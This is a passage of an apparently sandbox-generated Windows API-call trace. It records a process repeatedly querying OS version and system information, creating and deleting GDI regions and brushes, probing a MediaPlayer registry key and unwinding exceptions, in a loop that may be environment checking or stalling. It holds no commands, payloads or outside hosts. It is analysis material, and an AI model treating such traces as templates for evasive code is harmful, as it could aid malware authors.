dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.434] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.434] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.434] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.434] BeginPath (hdc=0x0) returned 0 [0092.434] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.435] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.435] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.435] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.435] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.435] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.435] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.435] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.435] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdd0401dc [0092.435] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdf0401d9 [0092.435] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047883 [0092.435] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047884 [0092.435] CombineRgn (hrgnDst=0x1047883, hrgnSrc1=0xdd0401dc, hrgnSrc2=0xdf0401d9, iMode=1) returned 1 [0092.435] CombineRgn (hrgnDst=0x1047884, hrgnSrc1=0xdd0401dc, hrgnSrc2=0xdf0401d9, iMode=4) returned 2 [0092.435] CreateSolidBrush (color=0xff) returned 0x2107882 [0092.435] CreateSolidBrush (color=0xff0000) returned 0x1107885 [0092.435] DeleteObject (ho=0x1107885) returned 1 [0092.435] DeleteObject (ho=0xdf0401d9) returned 1 [0092.435] DeleteObject (ho=0xdd0401dc) returned 1 [0092.435] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.435] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.435] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.435] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.435] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.435] BeginPath (hdc=0x0) returned 0 [0092.435] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.435] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.435] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.435] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.435] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.435] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.435] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.435] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.435] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe00401d9 [0092.435] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xde0401dc [0092.435] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047886 [0092.436] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047887 [0092.436] CombineRgn (hrgnDst=0x1047886, hrgnSrc1=0xe00401d9, hrgnSrc2=0xde0401dc, iMode=1) returned 1 [0092.436] CombineRgn (hrgnDst=0x1047887, hrgnSrc1=0xe00401d9, hrgnSrc2=0xde0401dc, iMode=4) returned 2 [0092.436] CreateSolidBrush (color=0xff) returned 0x2107885 [0092.436] CreateSolidBrush (color=0xff0000) returned 0x1107888 [0092.436] DeleteObject (ho=0x1107888) returned 1 [0092.436] DeleteObject (ho=0xde0401dc) returned 1 [0092.436] DeleteObject (ho=0xe00401d9) returned 1 [0092.436] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.436] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.436] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.436] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.436] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.436] BeginPath (hdc=0x0) returned 0 [0092.436] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.436] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.436] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.436] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.436] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.436] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.436] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.436] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.436] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdf0401dc [0092.436] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe10401d9 [0092.436] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047889 [0092.436] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104788a [0092.436] CombineRgn (hrgnDst=0x1047889, hrgnSrc1=0xdf0401dc, hrgnSrc2=0xe10401d9, iMode=1) returned 1 [0092.436] CombineRgn (hrgnDst=0x104788a, hrgnSrc1=0xdf0401dc, hrgnSrc2=0xe10401d9, iMode=4) returned 2 [0092.436] CreateSolidBrush (color=0xff) returned 0x2107888 [0092.436] CreateSolidBrush (color=0xff0000) returned 0x110788b [0092.436] DeleteObject (ho=0x110788b) returned 1 [0092.436] DeleteObject (ho=0xe10401d9) returned 1 [0092.436] DeleteObject (ho=0xdf0401dc) returned 1 [0092.436] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.436] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.437] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.437] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.437] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.437] BeginPath (hdc=0x0) returned 0 [0092.437] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.437] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.437] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.437] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.437] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.437] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.437] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.437] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.437] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe20401d9 [0092.437] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe00401dc [0092.437] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104788c [0092.437] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104788d [0092.437] CombineRgn (hrgnDst=0x104788c, hrgnSrc1=0xe20401d9, hrgnSrc2=0xe00401dc, iMode=1) returned 1 [0092.437] CombineRgn (hrgnDst=0x104788d, hrgnSrc1=0xe20401d9, hrgnSrc2=0xe00401dc, iMode=4) returned 2 [0092.437] CreateSolidBrush (color=0xff) returned 0x210788b [0092.437] CreateSolidBrush (color=0xff0000) returned 0x110788e [0092.437] DeleteObject (ho=0x110788e) returned 1 [0092.437] DeleteObject (ho=0xe00401dc) returned 1 [0092.437] DeleteObject (ho=0xe20401d9) returned 1 [0092.437] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.437] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.437] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.437] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.437] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.437] BeginPath (hdc=0x0) returned 0 [0092.437] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.437] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.437] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.437] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.437] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.437] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.437] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.437] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.438] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe10401dc [0092.438] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe30401d9 [0092.438] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104788f [0092.438] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047890 [0092.438] CombineRgn (hrgnDst=0x104788f, hrgnSrc1=0xe10401dc, hrgnSrc2=0xe30401d9, iMode=1) returned 1 [0092.438] CombineRgn (hrgnDst=0x1047890, hrgnSrc1=0xe10401dc, hrgnSrc2=0xe30401d9, iMode=4) returned 2 [0092.438] CreateSolidBrush (color=0xff) returned 0x210788e [0092.438] CreateSolidBrush (color=0xff0000) returned 0x1107891 [0092.438] DeleteObject (ho=0x1107891) returned 1 [0092.438] DeleteObject (ho=0xe30401d9) returned 1 [0092.438] DeleteObject (ho=0xe10401dc) returned 1 [0092.438] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.438] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.438] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.438] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.438] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.438] BeginPath (hdc=0x0) returned 0 [0092.438] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.438] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.438] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.438] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.438] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.438] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.438] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.438] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.439] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe40401d9 [0092.439] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe20401dc [0092.439] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047892 [0092.439] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047893 [0092.439] CombineRgn (hrgnDst=0x1047892, hrgnSrc1=0xe40401d9, hrgnSrc2=0xe20401dc, iMode=1) returned 1 [0092.439] CombineRgn (hrgnDst=0x1047893, hrgnSrc1=0xe40401d9, hrgnSrc2=0xe20401dc, iMode=4) returned 2 [0092.439] CreateSolidBrush (color=0xff) returned 0x2107891 [0092.439] CreateSolidBrush (color=0xff0000) returned 0x1107894 [0092.439] DeleteObject (ho=0x1107894) returned 1 [0092.439] DeleteObject (ho=0xe20401dc) returned 1 [0092.439] DeleteObject (ho=0xe40401d9) returned 1 [0092.439] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.439] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.439] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.439] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.439] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.439] BeginPath (hdc=0x0) returned 0 [0092.439] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.439] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.439] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.439] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.439] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.440] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.440] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.440] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.440] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe30401dc [0092.440] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe50401d9 [0092.440] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047895 [0092.440] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047896 [0092.440] CombineRgn (hrgnDst=0x1047895, hrgnSrc1=0xe30401dc, hrgnSrc2=0xe50401d9, iMode=1) returned 1 [0092.440] CombineRgn (hrgnDst=0x1047896, hrgnSrc1=0xe30401dc, hrgnSrc2=0xe50401d9, iMode=4) returned 2 [0092.440] CreateSolidBrush (color=0xff) returned 0x2107894 [0092.440] CreateSolidBrush (color=0xff0000) returned 0x1107897 [0092.440] DeleteObject (ho=0x1107897) returned 1 [0092.440] DeleteObject (ho=0xe50401d9) returned 1 [0092.440] DeleteObject (ho=0xe30401dc) returned 1 [0092.440] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.440] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.440] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.440] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.440] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.440] BeginPath (hdc=0x0) returned 0 [0092.440] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.440] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.440] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.440] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.440] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.440] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.440] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.441] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.441] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe60401d9 [0092.441] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe40401dc [0092.441] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047898 [0092.441] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047899 [0092.441] CombineRgn (hrgnDst=0x1047898, hrgnSrc1=0xe60401d9, hrgnSrc2=0xe40401dc, iMode=1) returned 1 [0092.441] CombineRgn (hrgnDst=0x1047899, hrgnSrc1=0xe60401d9, hrgnSrc2=0xe40401dc, iMode=4) returned 2 [0092.441] CreateSolidBrush (color=0xff) returned 0x2107897 [0092.441] CreateSolidBrush (color=0xff0000) returned 0x110789a [0092.441] DeleteObject (ho=0x110789a) returned 1 [0092.441] DeleteObject (ho=0xe40401dc) returned 1 [0092.441] DeleteObject (ho=0xe60401d9) returned 1 [0092.441] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.441] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.441] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.441] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.441] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.441] BeginPath (hdc=0x0) returned 0 [0092.441] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.441] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.441] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.441] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.441] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.441] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.441] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.441] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.442] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe50401dc [0092.442] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe70401d9 [0092.442] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104789b [0092.442] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104789c [0092.442] CombineRgn (hrgnDst=0x104789b, hrgnSrc1=0xe50401dc, hrgnSrc2=0xe70401d9, iMode=1) returned 1 [0092.442] CombineRgn (hrgnDst=0x104789c, hrgnSrc1=0xe50401dc, hrgnSrc2=0xe70401d9, iMode=4) returned 2 [0092.442] CreateSolidBrush (color=0xff) returned 0x210789a [0092.442] CreateSolidBrush (color=0xff0000) returned 0x110789d [0092.442] DeleteObject (ho=0x110789d) returned 1 [0092.442] DeleteObject (ho=0xe70401d9) returned 1 [0092.442] DeleteObject (ho=0xe50401dc) returned 1 [0092.442] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.442] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.442] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.442] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.442] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.442] BeginPath (hdc=0x0) returned 0 [0092.442] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.442] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.442] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.442] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.442] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.442] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.442] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) 